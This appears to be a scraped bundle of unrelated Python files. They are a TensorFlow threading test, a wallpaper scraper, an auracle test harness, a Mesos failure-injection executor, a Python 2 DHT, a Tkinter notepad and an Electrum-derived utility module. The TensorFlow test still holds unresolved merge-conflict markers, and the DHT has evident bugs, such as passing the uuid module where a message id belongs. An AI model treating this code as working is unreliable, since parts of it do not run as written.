self.evaluate(variables.global_variables_initializer())
def run_add(add_op):
self.evaluate(add_op)
threads = [
self.checkedThread(
target=run_add, args=(add_op,)) for add_op in adds
]
=======
with self.test_session() as sess:
ones_t = tf.fill([1024, 1024], 1.0)
p = tf.Variable(tf.zeros([1024, 1024]))
adds = [tf.assign_add(p, ones_t, use_locking=False)
for _ in range(20)]
tf.initialize_all_variables().run()
def run_add(add_op):
sess.run(add_op)
threads = [self.checkedThread(target=run_add, args=(add_op,))
for add_op in adds]
>>>>>>> f41959ccb2... TensorFlow: Initial commit of TensorFlow library.
for t in threads:
t.start()
for t in threads:
t.join()
<<<<<<< HEAD
vals = self.evaluate(p)
=======
vals = p.eval()
>>>>>>> f41959ccb2... TensorFlow: Initial commit of TensorFlow library.
ones = np.ones((1024, 1024)).astype(np.float32)
self.assertTrue((vals >= ones).all())
self.assertTrue((vals <= ones * 20).all())
def testParallelAssignWithoutLocking(self):
<<<<<<< HEAD
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
ones_t = array_ops.fill([1024, 1024], float(1))
p = variables.Variable(array_ops.zeros([1024, 1024]))
assigns = [
state_ops.assign(p, math_ops.multiply(ones_t, float(i)), False)
for i in range(1, 21)
]
self.evaluate(variables.global_variables_initializer())
def run_assign(assign_op):
self.evaluate(assign_op)
threads = [
self.checkedThread(
target=run_assign, args=(assign_op,)) for assign_op in assigns
]
=======
with self.test_session() as sess:
ones_t = tf.fill([1024, 1024], float(1))
p = tf.Variable(tf.zeros([1024, 1024]))
assigns = [tf.assign(p, tf.mul(ones_t, float(i)), False)
for i in range(1, 21)]
tf.initialize_all_variables().run()
def run_assign(assign_op):
sess.run(assign_op)
threads = [self.checkedThread(target=run_assign, args=(assign_op,))
for assign_op in assigns]
>>>>>>> f41959ccb2... TensorFlow: Initial commit of TensorFlow library.
for t in threads:
t.start()
for t in threads:
t.join()
<<<<<<< HEAD
vals = self.evaluate(p)
=======
vals = p.eval()
>>>>>>> f41959ccb2... TensorFlow: Initial commit of TensorFlow library.
# Assert every element is taken from one of the assignments.
self.assertTrue((vals > 0).all())
self.assertTrue((vals <= 20).all())
<<<<<<< HEAD
# NOTE(skyewm): We exclude these tests from the TSAN TAP target, because they
# contain non-benign but known data races between the variable assignment and
# returning the output tensors. This issue will be resolved with the new
# resource variables.
def testParallelUpdateWithLocking(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
zeros_t = array_ops.fill([1024, 1024], 0.0)
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(zeros_t)
adds = [
state_ops.assign_add(
p, ones_t, use_locking=True) for _ in range(20)
]
self.evaluate(p.initializer)
def run_add(add_op):
self.evaluate(add_op)
threads = [
self.checkedThread(
target=run_add, args=(add_op,)) for add_op in adds
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
ones = np.ones((1024, 1024)).astype(np.float32)
self.assertAllEqual(vals, ones * 20)
def testParallelAssignWithLocking(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
zeros_t = array_ops.fill([1024, 1024], 0.0)
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(zeros_t)
assigns = [
state_ops.assign(
p, math_ops.multiply(ones_t, float(i)), use_locking=True)
for i in range(1, 21)
]
self.evaluate(p.initializer)
def run_assign(assign_op):
self.evaluate(assign_op)
threads = [
self.checkedThread(
target=run_assign, args=(assign_op,)) for assign_op in assigns
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
# Assert every element is the same, and taken from one of the assignments.
self.assertTrue(vals[0, 0] > 0)
self.assertTrue(vals[0, 0] <= 20)
self.assertAllEqual(vals, np.ones([1024, 1024]) * vals[0, 0])
if __name__ == "__main__":
test.main()
=======
if __name__ == "__main__":
tf.test.main()
>>>>>>> f41959ccb2... TensorFlow: Initial commit of TensorFlow library.
|
practice_01.py | import requests
import json
import threading
import random
def get_requestHeaders():
headers = {
# 'accept': 'application/json, text/plain, */*',
# 'accept-encoding': 'gzip, deflate, br',
# 'accept-language': 'zh-CN,zh;q=0.9',
# 'content-length': '172',
# 'content-type': 'application/json;charset=UTF-8',
# 'dnt': '1',
# 'origin': 'https://wallpaper.zhhainiao.com',
# 'referer': 'https://wallpaper.zhhainiao.com/',
# 'sec-ch-ua': '"Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"',
# 'sec-ch-ua-mobile': '?0',
# 'sec-fetch-dest': 'empty',
# 'sec-fetch-mode': 'cors',
# 'sec-fetch-site': 'same-site',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36',
# 'x-cf-device-id': 'xxxx-xxx-xxx',
# 'x-cf-platform': 'webview'
}
return headers
def thd(dicts, page):
for i in dicts:
if i["Jpg4kUrl"] != "":
url = i["Jpg4kUrl"] # 存在4k就下载4k的
elif i["Jpg1920Url"] != "":
url = i["Jpg1920Url"]
name = i["wname"]
if name == '':
# 没有文件名就随便起一个
name = str(random.randint(1, 9)) + str(random.randint(1, 99)) + str(random.randint(1, 999999)) + ".jpg"
print(url, name, page)
pic = requests.get(url).content
# 文件保存路径,我这里用到时z盘内存盘,emm,自行修改叭
with open("z:/spider/" + name + ".jpg", 'wb') as f:
f.write(pic)
def get_post_data(pageNumber=1, pageSize=24):
post_data = '{"login_info":{},"cate_id":2,"tag_id":null,"sort_type":2,"page":' + str(
pageNumber) + ',"page_size":' + str(
pageSize) + ',"common":{"open_id":null,"token":null,"device_id":null,"player_version":0,"platform":"pc"}}'
return post_data
if __name__ == '__main__':
post_data = get_post_data(1, 1)
response = requests.post("https://pcwallpaper.zhhainiao.com/wallpaper/static/list", headers=get_requestHeaders(),
data=post_data)
json_data = json.loads(response.text)["data"]
total = json_data["total"]
print(total)
'''
for page in range(1, 100):
r = requests.post("https://pcwallpaper.zhhainiao.com/wallpaper/static/list",
headers=get_requestHeaders(),
data='{"login_info":{},"cate_id":2,"tag_id":null,"sort_type":2,"page":' + str(page) +
',"page_size":24,'
'"common":{"open_id":null,"token":null,"device_id":null,"player_version":0,"platform":"pc"}}')
json_data = r.text
dumps = json.loads(json_data)
dicts = dumps["data"]["list"]
url = ""
name = ""
with open("json","w",encoding="utf-8") as f:
f.write(json_data)
threading.Thread(target=thd, args=(dicts,page,)).start()
'''
|
auracle_test.py | #!/usr/bin/env python
import fakeaur.server
import glob
import multiprocessing
import os.path
import subprocess
import tempfile
import time
import unittest
def FindMesonBuildDir():
# When run through meson or ninja, we're already in the build dir
if os.path.exists('.ninja_log'):
return os.path.curdir
# When run manually, we're probably in the repo root.
paths = glob.glob('*/.ninja_log')
if len(paths) > 1:
raise ValueError('Multiple build directories found. Unable to proceed.')
if len(paths) == 0:
raise ValueError(
'No build directory found. Have you run "meson build" yet?')
return os.path.dirname(paths[0])
class HTTPRequest(object):
def __init__(self, request):
self.requestline = request.pop(0)
self.command, self.path, self.request_version = self.requestline.split()
self.headers = {}
for line in request:
k, v = line.split(':', 1)
self.headers[k.lower()] = v.strip()
class TimeLoggingTestResult(unittest.runner.TextTestResult):
def startTest(self, test):
self._started_at = time.time()
super().startTest(test)
def addSuccess(self, test):
elapsed = time.time() - self._started_at
self.stream.write('\n{} ({:.03}s)'.format(
self.getDescription(test), elapsed))
class TestCase(unittest.TestCase):
def setUp(self):
self.build_dir = FindMesonBuildDir()
self._tempdir = tempfile.TemporaryDirectory()
self.tempdir = self._tempdir.name
self.requests_file = tempfile.NamedTemporaryFile(
dir=self.tempdir, prefix='requests-', delete=False).name
q = multiprocessing.Queue()
self.server = multiprocessing.Process(
target=fakeaur.server.Serve, args=(q,))
self.server.start()
self.baseurl = q.get()
self._WritePacmanConf()
def tearDown(self):
self.server.terminate()
def _ProcessDebugOutput(self):
self.requests_sent = []
with open(self.requests_file) as f:
header_text = []
for line in f.read().splitlines():
if line:
header_text.append(line)
else:
self.requests_sent.append(HTTPRequest(header_text))
header_text = []
self.request_uris = [r.path for r in self.requests_sent]
def _WritePacmanConf(self):
with open(os.path.join(self.tempdir, 'pacman.conf'), 'w') as f:
f.write('[options]\nDBPath = {}/fakepacman'.format(
os.path.dirname(os.path.realpath(__file__))))
def Auracle(self, args):
env = {
'PATH': '{}/fakeaur:{}'.format(
os.path.dirname(os.path.realpath(__file__)), os.getenv('PATH')),
'AURACLE_TEST_TMPDIR': self.tempdir,
'AURACLE_DEBUG': 'requests:{}'.format(self.requests_file),
'LC_TIME': 'C',
'TZ': 'UTC',
}
cmdline = [
os.path.join(self.build_dir, 'auracle'),
'--baseurl', self.baseurl,
'--color=never',
'--pacmanconfig={}/pacman.conf'.format(self.tempdir),
'--chdir', self.tempdir,
] + args
p = subprocess.run(cmdline, env=env, capture_output=True)
self._ProcessDebugOutput()
return p
def assertPkgbuildExists(self, pkgname, git=False):
self.assertTrue(
os.path.exists(os.path.join(self.tempdir, pkgname, 'PKGBUILD')))
if git:
self.assertTrue(
os.path.exists(os.path.join(self.tempdir, pkgname, '.git')))
def main():
test_runner = unittest.TextTestRunner(resultclass=TimeLoggingTestResult)
unittest.main(testRunner=test_runner)
|
executor.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import sys
import threading
from collections import namedtuple
import json
import logging
try:
from mesos.native import MesosExecutorDriver
from mesos.interface import Executor
from mesos.interface import mesos_pb2
except ImportError:
from mesos import Executor, MesosExecutorDriver
import mesos_pb2
from fabric.api import run, local, put, env, warn_only
from fabric.tasks import execute
logger = logging.getLogger("executor")
logger.setLevel(logging.DEBUG)
handler = logging.StreamHandler()
handler.setFormatter(
logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
logger.addHandler(handler)
# falure steps
INIT, BEFORE_FAILURE, AFTER_FAILURE, AFTER_REVERT = range(4)
class FailureExecutor(Executor):
"""
Runs failure based on given from scheduler config.
For each failure in config do next steps:
- run healthcheck script, if failed stop failure running
- copy falure inducer script to the tested hosts
- run failure inducer script and store result
- run healthcheck and store result
- run failure reverter and store result
- run healthcheck and store result
If sys code of scripts runned on each step is succeeded failure running is succeeded,
otherwise is failed. If config key `failfast` is `true` and failure running is failed
execution of next failure will be stopped.
"""
def __init__(self):
self.logger = logger
def get_config(self, json_config):
def object_hook(d): return namedtuple('Config', d.keys())(*d.values())
return json.loads(
json_config,
object_hook=object_hook)
def run_failure(self, conn_config, failure_config, hostname):
statuses = []
def append_res(step, res):
statuses.append((step, res.succeeded, str(res)))
def healthcheck(step):
healthcheck_command = " ".join(
failure_config.healthcheck + ["--step=%s" % step])
with warn_only():
return local(healthcheck_command)
def task():
env.user = conn_config.username
if conn_config.password:
env.password = conn_config.password
if conn_config.key_filename:
env.key_filename = conn_config.key_filename
res = healthcheck(BEFORE_FAILURE)
self.logger.debug("Run healthcheck before failure, succeeded: %s", res.succeeded)
append_res('healthcheck before failure', res)
if res.failed:
return
self.logger.debug("Run inducer")
inducer_command = " ".join(failure_config.inducer)
inducer_file_name = failure_config.inducer[0].split("/")[-1]
put(inducer_file_name, failure_config.inducer[0], mode=0755)
res = run(inducer_command, quiet=True)
append_res('failure', res)
self.logger.debug("Run healthcheck after inducer, succeeded: %s", res.succeeded)
append_res('healthcheck after failure', healthcheck(AFTER_FAILURE))
self.logger.debug("Run reverter")
reverter_command = " ".join(failure_config.reverter)
reverter_file_name = failure_config.reverter[0].split("/")[-1]
put(reverter_file_name, failure_config.reverter[0], mode=0755)
res = run(reverter_command, quiet=True)
append_res('reverter', res)
self.logger.debug("Run healthcheck after reverter, succeeded: %s", res.succeeded)
append_res('healthcheck after reverter', healthcheck(AFTER_REVERT))
execute(task, host=hostname)
self.logger.debug("Statuses %s", statuses)
all_succeeded = all(i[1] for i in statuses) or False
return all_succeeded, statuses
def process_host(self, config, hostname):
self.logger.debug("Process host %s with failures %s", hostname, config.failures)
failures_statuses = {
failure_config.name: None
for failure_config in config.failures
}
for failure_config in config.failures:
succeeded, statuses = self.run_failure(config.ssh, failure_config, hostname)
failures_statuses[failure_config.name] = [succeeded, statuses]
if config.failfast and not succeeded:
self.logger.info("Failfast after scenario %s", failure_config.name)
break
return failures_statuses
def process_hosts(self, config):
self.logger.debug("Start hosts processing")
loglevel = getattr(logging, config.loglevel.upper())
self.logger.setLevel(loglevel)
return {
hostname: self.process_host(config, hostname)
for hostname in config.hosts
}
def launchTask(self, driver, task):
self.logger.debug("Launch task %s", task)
def run_task():
update = mesos_pb2.TaskStatus()
update.task_id.value = task.task_id.value
update.state = mesos_pb2.TASK_RUNNING
driver.sendStatusUpdate(update)
config = self.get_config(task.data)
self.logger.debug("Parsed config %s", config)
statuses = self.process_hosts(config)
update = mesos_pb2.TaskStatus()
update.task_id.value = task.task_id.value
update.state = mesos_pb2.TASK_FINISHED
# collect stdout/stderr
update.data = json.dumps(statuses)
self.logger.debug("Task finished")
driver.sendStatusUpdate(update)
return
thread = threading.Thread(target=run_task)
thread.start()
def main():
driver = MesosExecutorDriver(FailureExecutor())
sys.exit(0 if driver.run() == mesos_pb2.DRIVER_STOPPED else 1)
if __name__ == "__main__":
main()
|
pydht.py | import math
import json
import random
import uuid
import SocketServer
import threading
import time
import key_derivation
from .bucketset import BucketSet
from .hashing import hash_function, random_id
from .peer import Peer
from .shortlist import Shortlist
k = 20
alpha = 3
id_bits = 128
iteration_sleep = 1
keysize = 2048
DEFAULT_TTL = 604800 # = 7 days, in seconds.
class DHTRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
try:
message = json.loads(self.request[0].strip())
message_type = message["message_type"]
print "Received message of type", message_type, "from", message["peer_id"]
if message_type == "ping":
self.handle_ping(message)
elif message_type == "pong":
self.handle_pong(message)
elif message_type == "find_node":
self.handle_find(message)
elif message_type == "find_value":
self.handle_find(message, find_value=True)
elif message_type == "found_nodes":
self.handle_found_nodes(message)
elif message_type == "found_value":
self.handle_found_value(message)
elif message_type == "store":
print "Request to store"
self.handle_store(message)
elif message_type == "downvote":
print "Asked to downvote an item"
self.handle_downvote(message)
except KeyError, ValueError:
pass
client_host, client_port = self.client_address
peer_id = message["peer_id"]
new_peer = Peer(client_host, client_port, peer_id)
self.server.dht.buckets.insert(new_peer)
def handle_ping(self, message):
client_host, client_port = self.client_address
id = message["peer_id"]
peer = Peer(client_host, client_port, id)
peer.pong(socket=self.server.socket, peer_id=self.server.dht.peer.id, lock=self.server.send_lock)
def handle_pong(self, message):
pass
def handle_find(self, message, find_value=False):
key = message["id"]
id = message["peer_id"]
client_host, client_port = self.client_address
peer = Peer(client_host, client_port, id)
response_socket = self.request[1]
if find_value and (key in self.server.dht.data):
value = self.server.dht.data[key]
peer.found_value(id, value, message["rpc_id"], socket=response_socket, peer_id=self.server.dht.peer.id, lock=self.server.send_lock)
else:
nearest_nodes = self.server.dht.buckets.nearest_nodes(id)
if not nearest_nodes:
nearest_nodes.append(self.server.dht.peer)
nearest_nodes = [nearest_peer.astriple() for nearest_peer in nearest_nodes]
peer.found_nodes(id, nearest_nodes, message["rpc_id"], socket=response_socket, peer_id=self.server.dht.peer.id, lock=self.server.send_lock)
def handle_found_nodes(self, message):
rpc_id = message["rpc_id"]
shortlist = self.server.dht.rpc_ids[rpc_id]
del self.server.dht.rpc_ids[rpc_id]
nearest_nodes = [Peer(*peer) for peer in message["nearest_nodes"]]
shortlist.update(nearest_nodes)
def handle_found_value(self, message):
rpc_id = message["rpc_id"]
shortlist = self.server.dht.rpc_ids[rpc_id]
del self.server.dht.rpc_ids[rpc_id]
shortlist.set_complete(message["value"])
def handle_store(self, message):
key = message["id"]
print "Asked to store data for id", key
print "Ciphertext is", message["value"]
self.server.dht.data[key] = message["value"]
self.server.dht.ttls[key] = DEFAULT_TTL
def handle_downvote(self, message):
key = message["id"]
print "Downvote for key", key, " -- uuid is ", message["uid"]
self.server.dht.handle_downvote(key, uuid)
class DHTServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
def __init__(self, host_address, handler_cls):
SocketServer.UDPServer.__init__(self, host_address, handler_cls)
self.send_lock = threading.Lock()
class DHT(object):
def __init__(self, host, port, id=None, boot_host=None, boot_port=None):
if not id:
id = random_id()
self.id = id
self.peer = Peer(unicode(host), port, id)
# Data and data decay data structures
self.data = {}
self.recent_downvotes = []
self.downvotes = {}
self.ttls = {}
self.pending_replies = {}
self.buckets = BucketSet(k, id_bits, self.peer.id)
self.rpc_ids = {} # should probably have a lock for this
self.server = DHTServer(self.peer.address(), DHTRequestHandler)
self.server.dht = self
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
self.bootstrap(unicode(boot_host), boot_port)
def iterative_find_nodes(self, key, boot_peer=None):
shortlist = Shortlist(k, key)
shortlist.update(self.buckets.nearest_nodes(key, limit=alpha))
if boot_peer:
rpc_id = random.getrandbits(id_bits)
self.rpc_ids[rpc_id] = shortlist
boot_peer.find_node(key, rpc_id, socket=self.server.socket, peer_id=self.peer.id)
while (not shortlist.complete()) or boot_peer:
nearest_nodes = shortlist.get_next_iteration(alpha)
for peer in nearest_nodes:
shortlist.mark(peer)
rpc_id = random.getrandbits(id_bits)
self.rpc_ids[rpc_id] = shortlist
peer.find_node(key, rpc_id, socket=self.server.socket, peer_id=self.peer.id) ######
time.sleep(iteration_sleep)
boot_peer = None
return shortlist.results()
def iterative_find_value(self, key):
shortlist = Shortlist(k, key)
shortlist.update(self.buckets.nearest_nodes(key, limit=alpha))
while not shortlist.complete():
nearest_nodes = shortlist.get_next_iteration(alpha)
for peer in nearest_nodes:
shortlist.mark(peer)
rpc_id = random.getrandbits(id_bits)
self.rpc_ids[rpc_id] = shortlist
peer.find_value(key, rpc_id, socket=self.server.socket, peer_id=self.peer.id) #####
time.sleep(iteration_sleep)
return shortlist.completion_result()
def bootstrap(self, boot_host, boot_port):
if boot_host and boot_port:
boot_peer = Peer(boot_host, boot_port, 0)
self.iterative_find_nodes(self.peer.id, boot_peer=boot_peer)
def __getitem__(self, key):
hashed_key = hash_function(key)
if hashed_key in self.data:
return self.data[hashed_key]
result = self.iterative_find_value(hashed_key)
if result:
return result
raise KeyError
def __setitem__(self, key, value):
hashed_key = hash_function(key)
nearest_nodes = self.iterative_find_nodes(hashed_key)
if not nearest_nodes:
self.data[hashed_key] = value
for node in nearest_nodes:
node.store(hashed_key, value, socket=self.server.socket, peer_id=self.peer.id)
def publish(self, value):
key = str(uuid.uuid4())
print "Publishing content under new key:", key
hashed_key = hash_function(key)
print "Hashed key is:", hashed_key
# need to encrypt value
ciphertext = key_derivation.do_encrypt(key, value)
print "Cyphertext is:", ciphertext
nearest_nodes = self.iterative_find_nodes(hashed_key)
if not nearest_nodes:
print "Storing data for key {} locally".format(key)
self.data[hashed_key] = ciphertext
for node in nearest_nodes:
print "Sending data for key {} to closer nodes.".format(key)
node.store(hashed_key, ciphertext, socket=self.server.socket, peer_id=self.peer.id)
return key
def retrieve(self, key):
# Retrieve result
print "Looking up key:", key
hashed_key = hash_function(key)
print "Hashed key is", hashed_key
result = None
if hashed_key in self.data:
print "Data for key", "stored locally"
result = self.data[hashed_key]
else:
print "Data stored somewhere else: forwarding request"
result = self.iterative_find_value(hashed_key)
if not result:
print "Key", key, "not found"
raise KeyError
# result is encrypted + hmac'd
# Can throw ValueError if HMAC fails
print "Ciphertext is", result
plaintext = key_derivation.do_decrypt(key, result)
return plaintext
def downvote(self, key):
uid = str(uuid.uuid4())
hashed_key = hash_function(key)
nearest_nodes = self.iterative_find_nodes(hashed_key)
print "Downvoting", key
if not nearest_nodes:
print "Asked myself to downvote a key: {}".format(key)
for node in nearest_nodes:
print "Asking another node to downvote", key
node.downvote(hashed_key, uid, socket=self.server.socket, peer_id=self.peer.id)
def handle_downvote(self, key, uuid):
if uuid in self.recent_downvotes:
return
if key not in self.data:
return
self.downvotes[key] += 1
self.recent_downvotes.append(uuid)
def tick(self):
for (uuid, downvotes) in self.downvotes.items():
downvote_val = math.log(downvotes, 2)
self.ttls[uuid] -= downvote_val
for (uuid, ttl) in self.ttls.items():
if ttl <= 0:
print "UUID", uuid, " past TTL - deleting"
|
aplicativo.pyw | #! /usr/bin/python3.7
# -*- coding: utf-8 -*-
from tkinter import *
from tkinter import filedialog
import subprocess
import threading
import chardet
import sys
import os
from aspecto import Aspecto
from widgets.barrasuperior import BarraSuperior
from widgets.conteudo import Conteudo
from widgets.barrainferior import BarraInferior
from widgets.janelasalvar import JanelaSalvar
class Aplicativo(Tk):
def __init__(self):
super().__init__()
self.aspecto = Aspecto(self)
self.diretorio = ''
self.receberArquivo()
self.arquivoSalvo = False
self.chaveAtual = 'UTF-8'
self.janelaDeSalvar = None
self.barraSuperior = BarraSuperior(self)
self.conteudo = Conteudo(self)
self.barraInferior = BarraInferior(self)
self.mensagem = self.conteudo.conteudo.get(1.0, END)
self.bytes = bytes(self.mensagem, self.chaveAtual)
self.protocol('WM_DELETE_WINDOW', self.fecharJanela)
self.bind('<KeyPress>', self.verificarSalvamento)
self.verificarDiretorio()
self.verificarSalvamento()
# Funções da Barra Superior
def novo(self):
if self.janelaDeSalvar or self.arquivoSalvo:
self.diretorio = 'Arquivo novo'
self.conteudo.conteudo.delete(1.0, END)
self.mensagem = self.conteudo.conteudo.get(1.0, END)
else:
self.janelaDeSalvar = JanelaSalvar(self, 'novo')
self.verificarSalvamento()
def novaJanela(self):
aplicativo = threading.Thread(target=self.abrirApp)
aplicativo.start()
def carregar(self):
if self.janelaDeSalvar or self.arquivoSalvo:
copia = self.diretorio
self.diretorio = filedialog.askopenfilename(defaultextension='.txt',
filetypes=[('Arquivos de texto', '.txt'),
('Todos arquivos', '.*')])
if not self.diretorio:
self.diretorio = copia
else:
self.substituirConteudo()
else:
self.janelaDeSalvar = JanelaSalvar(self, 'carregar')
self.verificarSalvamento()
def salvar(self):
if self.diretorio == 'Arquivo novo':
self.salvarComo()
else:
self.salvarArquivo()
self.verificarSalvamento()
def salvarComo(self):
copia = self.diretorio
self.diretorio = filedialog.asksaveasfilename(defaultextension='.txt',
filetypes=[('Arquivos de texto', '.txt'),
('Todos arquivos', '.*')],
initialfile='*.txt')
if not self.diretorio:
self.diretorio = copia
else:
self.salvarArquivo()
self.verificarSalvamento()
def mudarCodificacao(self, norma):
self.chaveAtual = norma
self.barraInferior.status['text'] = self.chaveAtual
# Métodos de manipulação de arquivos
def tentarAbrir(self):
with open(self.diretorio, 'rb') as arquivo:
self.bytes = arquivo.read()
try:
self.mensagem = self.bytes.decode(self.chaveAtual)
except UnicodeDecodeError:
chute = chardet.detect(self.bytes)
self.mensagem = self.bytes.decode(chute['encoding'])
self.chaveAtual = chute['encoding']
finally:
self.barraInferior.status['text'] = self.chaveAtual
def salvarArquivo(self):
with open(self.diretorio, 'wb') as arquivo:
texto = self.conteudo.conteudo.get(1.0, END)
self.bytes = texto.encode(self.chaveAtual)
arquivo.write(self.bytes)
self.mensagem = self.bytes.decode(self.chaveAtual)
# Funções que verificam o estado do texto do conteúdo
def verificarSalvamento(self, evento=None):
if self.mensagem == self.conteudo.conteudo.get(0.0, END):
self.title(f'{self.diretorio} - Bloco de Notas')
self.arquivoSalvo = True
else:
self.title(f'{self.diretorio} * - Bloco de Notas')
self.arquivoSalvo = False
self.bytes = bytes(self.mensagem, self.chaveAtual)
self.verBytes()
def fecharJanela(self):
self.verificarSalvamento()
if self.janelaDeSalvar:
self.janelaDeSalvar.lift()
elif not self.arquivoSalvo:
self.janelaDeSalvar = JanelaSalvar(self, 'fechar')
else:
self.destroy()
# Outras funções
def abrirApp(self):
if os.name == 'nt':
subprocess.call(['pythonw', 'aplicativo.pyw'])
else:
os.system('./aplicativo.pyw')
def receberArquivo(self):
if len(sys.argv) < 2:
self.diretorio = 'Arquivo novo'
else:
self.diretorio = sys.argv[1]
try:
arquivo = open(self.diretorio)
arquivo.close()
except FileNotFoundError:
self.diretorio = 'Arquivo novo'
def verificarDiretorio(self):
if self.diretorio != 'Arquivo novo':
self.substituirConteudo()
def substituirConteudo(self):
self.tentarAbrir()
self.conteudo.conteudo.delete(1.0, END)
self.conteudo.conteudo.insert(END, self.mensagem)
self.conteudo.conteudo.delete(float(self.conteudo.conteudo.index(END)) - 1.0)
def verBytes(self):
print(self.bytes)
if __name__ == '__main__':
Aplicativo().mainloop()
|
util.py | # Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from typing import NamedTuple
from datetime import datetime
import decimal
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import stat
import inspect
from locale import localeconv
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'FJC':8, 'mFJC':5, 'bits':2, 'sat':0}
base_units_inverse = inv_dict(base_units)
base_units_list = ['FJC', 'mFJC', 'bits', 'sat'] # list(dict) does not guarantee order
def decimal_point_to_base_unit_name(dp: int) -> str:
# e.g. 8 -> "BTC"
try:
return base_units_inverse[dp]
except KeyError:
raise Exception('Unknown base unit')
def base_unit_name_to_decimal_point(unit_name: str) -> int:
# e.g. "BTC" -> 8
try:
return base_units[unit_name]
except KeyError:
raise Exception('Unknown base unit')
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
__slots__ = ('value',)
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Satoshis(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " FJC"
class Fiat(object):
__slots__ = ('value', 'ccy')
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
if isinstance(obj, set):
return list(obj)
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
verbosity_filter = ''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
if self.verbosity_filter in verbosity or verbosity == '*':
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
